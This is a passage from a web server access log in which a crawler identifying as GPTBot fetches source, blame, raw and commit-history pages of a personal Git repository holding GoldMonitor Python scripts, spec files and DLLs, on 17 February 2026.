"/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 150852] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:14:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 12328] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 19360] [Gzip 6.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 10859] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" -[17/Feb/2026:14:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 22296] [Gzip 11.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:14:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 18583] [Gzip 5.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 11765] [Gzip 5.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:14:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 12398] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 11405] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:14:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:14:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:14:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 12357] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 9865] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:14:26:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py?display=source" [Client 74.7.227.38] [Length 19374] [Gzip 6.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:14:26:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 11459] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:14:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 9867] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:14:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:14:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 150852] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:14:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 11576] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:14:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:14:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:14:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 312513] [Gzip 21.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:14:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:14:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 11488] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:14:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 20439] [Gzip 10.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:14:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 19888] [Gzip 6.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 11764] [Gzip 5.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:14:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 19068] [Gzip 9.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:14:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 20838] [Gzip 6.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 8547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:14:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 12397] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 1056898] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:14:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 179] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:14:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 8126] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:14:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 12627] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 12269] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:14:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 10999] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 17999] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 9866] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:14:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 22263] [Gzip 11.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:14:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:14:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 11577] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:14:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 10233] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:14:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm" [Client 74.7.227.38] [Length 9880] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm" -[17/Feb/2026:14:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 11795] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:14:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 11406] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:14:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:14:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 179] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:14:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:14:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 